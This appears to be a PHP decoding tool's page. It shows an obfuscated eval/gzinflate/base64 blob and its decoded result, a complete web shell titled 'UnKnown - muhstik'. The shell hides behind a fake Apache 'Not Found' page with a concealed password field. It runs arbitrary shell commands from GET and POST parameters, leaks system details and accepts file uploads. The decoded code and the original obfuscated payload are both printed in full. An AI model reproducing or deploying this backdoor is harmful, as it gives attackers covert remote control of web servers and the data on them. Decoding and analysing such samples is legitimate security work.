Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

eval(gzinflate(str_rot13(base64_decode('rUl6QuNTEP6cVfkPgy862xKQhOOAWOK0SBsKKgJRTyuVO0yOvY..

Decoded Output download

@session_start(); 
error_reporting(0);

$auth_pass = "7417088120f026d02019047766a2fda9"; 

function printLogin() {
	echo "<h1>Not Found</h1>";
	echo "<p>The requested URL was not found on this server.</p>";
	echo "<hr>";
	echo "<address>Apache Server at ". $_SERVER['HTTP_HOST'] . " Port 80</address>";
    echo "<style>";
    echo "input { margin:0;background-color:#fff;border:1px solid #fff; }";
    echo "</style>";
    echo "<center>";
    echo "<form method=post>";
    echo "<input type=password name=pass>";
    echo "</form></center>";
	exit;
}

if (isset($_GET['wie'])) {
	$arr = array("who" => array(
		"os_name" => php_uname('s'),
		"uname_version_info" => php_uname('v'),
    	"machine_type" => php_uname('m'),
		"kernel" => php_uname('r'),
		"php_uname" => php_uname(),
		"is64bit" => PHP_INT_SIZE === 4 ? false : true
	));
	
   	print(json_encode($arr));

	exit;
} elseif (isset($_GET['knal'])) {
    $comd = $_GET['knal'];
    echo "<pre><font size=3 color=#000000>" . shell_exec($comd) . "</font></pre>";
	exit;
} elseif (isset($_POST['submit'])) {
	$uploaddir = pwd();
    if (!$name = $_POST['newname']) {
        $name = $_FILES['userfile']['name'];
    }
    move_uploaded_file($_FILES['userfile']['tmp_name'], $uploaddir . $name);
    if (move_uploaded_file($_FILES['userfile']['tmp_name'], $uploaddir . $name)) {
        echo "Upload Failed";
    } else {
        echo "Upload Success to " . $uploaddir . $name . " :D ";
    }
	exit;
}

if(!isset($_SESSION[md5($_SERVER['HTTP_HOST'])] )) {
    if(empty($auth_pass) || (isset( $_POST['pass']) && (md5($_POST['pass']) == $auth_pass))) {
        $_SESSION[md5($_SERVER['HTTP_HOST'])] = true; 
    } else {
        printLogin();
	}
}

echo "<title>UnKnown - muhstik</title><br>";
$cur_user = "(" . get_current_user() . ")";
echo "<font size=2 color=#888888><b>User : uid=" . getmyuid() . $cur_user . " gid=" . getmygid() . $cur_user . "</b><br>";
echo "<font size=2 color=#888888><b>Uname : " . php_uname() . "</b><br>";

function pwd()
{
    $cwd = getcwd();
    if ($u = strrpos($cwd, '/')) {
        if ($u != strlen($cwd) - 1) {
            return $cwd . '/';
        } else {
            return $cwd;
        }
        ;
    } elseif ($u = strrpos($cwd, '\')) {
        if ($u != strlen($cwd) - 1) {
            return $cwd . '\';
        } else {
            return $cwd;
        }
        ;
    }
    ;
}
echo '<form method="POST" action=""><font size=2 color=#888888><b>Command</b><br><input type="text" name="cmd"><input type="Submit" name="command" value="cok"></form>';
echo '<form enctype="multipart/form-data" action method=POST><font size=2 color=#888888><b>Upload File</b></font><br><input type=hidden name="submit"><input type=file name="userfile" size=28><br><font size=2 color=#888888><b>New name: </b></font><input type=text size=15 name="newname" class=ta><input type=submit class="bt" value="Upload"></form>';

if (isset($_POST['command'])) {
    $cmd = $_POST['cmd'];
    echo "<pre><font size=3 color=#000000>" . shell_exec($cmd) . "</font></pre>";
} else {
	if (strtoupper(substr(PHP_OS, 0, 3)) === 'WIN') {
		echo "<pre><font size=3 color=#000000>" . shell_exec('dir') . "</font></pre>";
	} else {
		echo "<pre><font size=3 color=#000000>" . shell_exec('ls -la') . "</font></pre>";
	}
}

Did this file decode correctly?

Original Code

eval(gzinflate(str_rot13(base64_decode('rUl6QuNTEP6cVfkPgy862xKQhOOAWOK0SBsKKgJRTyuVO0yOvY5d/NbdNYHe8d87u3gntoHr6Yo/EGl05tl0c2lz51RTGAvTxHPcodwwVNB2E1dGd0aSpZSHydLom6NBu9PuOjkP7MxuDCzQDvcHh/2jo8Fe3+/vHWv9vf7gUH//8PDgwNnzPeeDJpA6ej9CXI74kNEw4XTpMlkMEz5q2i3iBil142AwOUI5HKds4o17uNJTG242mQcEKPk7J4wTD66vzmDlMFXQwhcWgMg8CBkwT+8I3R33shpAQHhYx/Mo+jv5KWZcBJ5WI2M4dbvQtXTTq9+nSjf6yXx+dp9czOb6J9gFDS4xDmPUH/dXZgEJ+BWojD9RpLEZJkzO4TPEDlKXh/3RwmRil0dj3mTTKKXDN77vjxYp9QgdDrJ7YHYUbSBq4bFkT++5I8YuVjihzV0/pTHEhAepdHIp41q5b8YfMm+JXK6QASRBrEla5Z5Am4x7laNN5D7k+Pso0hv6YISMEWFn7V+n8xt9FRL9k6ky3GgoxauCf50HUFsFqQbWpEuiuKWlzBYny+0syOxcrAyd6ea2lMu1jSmSNzRZ/LSpbSdIBeGWFnBBw4TYwrWmXlxP3hKakKgppqVrvdfQKMQhO9hfhFwKL0Iu7dPzuT07/WYKlnLBPvwAvhMxAlDgNCd1borKdlaCLUwAxl8MPSGJm23EEPExSHqtgwoEAZ5R9TZkojKswtmum8YehrYmrnQuo3GCaiHhwMJ/iPUO5K2z3vTlN9Hwc7OAUZFa7ol4VUBG3GmR8oRwygVALd9CqF1vidzoLF/EId8kPc+iFAslFKnPSZ5uFryE5UlKUUYSSsYJTIkdtC5dk+6ttY5Cz6azGz3H8vbDCPXQUeoXoI/qJ0HviK0OJp4tNI10emyc2cp+GypRatWJSKavhEtmWHLmTSrBsYMIXkxhKrgvKs9l18XGAxy3BPaTg3GfGv4C2iYujTo1tsq0zaaz2enF+VrsvTeeem3mJ9gQVFgSdPzB2LR/E758KWLBOpNPINL49i0GQiLX97FAKgj1wHwbJ1hJlWtJno9L9YUR9/ax8L0oCB5leaHXyWJWuldgB+I8YDy8HfeUYLxD7a3r5tQWGRaPnCGivSTcxlqKLUMKDEwnpkNet9yyzPbKMjuSH6JBrgXWEPLQswq0+AEXEnJmmMjfsqqyfEFy3FusiX7T2fJhDOWlqTSzJkf1mRYV23av+8xXtBkk5DYquZvjPuOU4hNwCLV60HttPa2F3pZHjFUi9VkM/aCmJj5Xa0ETaN6uQBp65EIz3bCo6mH+rUjWWJQ/fnw1zgj1baTVj6pemXW99q54orY0Y3HOLFqbfP0a/JzGsSPGK5Xy6gigZGWP75kcADQ39rS6Zyab+02uYzS4ZqJcrmJEX80I+qjOFN84BRHnEQ8zHC6l3o7nY6dxXrojvPkPF8quiVpGukS8RQ1igtDzVUWwSA9G3SHRtgtk2cW14swjhfZIFudxJa2HQyVEwRfRR9aD98U5xROngRtu57O4RjNDJAuZtuDr2CqHeOGtj1uqvRYpqQ8HxXlDdcTe/50NXhoNNpe8JZhuxfA0zzJ5kegWrgwxI13MtqG/De9ZRkFW+h+n57oaFU3fUlTHdEJ/bkepEPpB8IjBQeS8iI8+/ws='))));

Function Calls

gzinflate 1
str_rot13 1
base64_decode 1

Variables

None

Stats

MD5 537f1a58821bc04c3b47d4445286f810
Eval Count 1
Decode Time 85 ms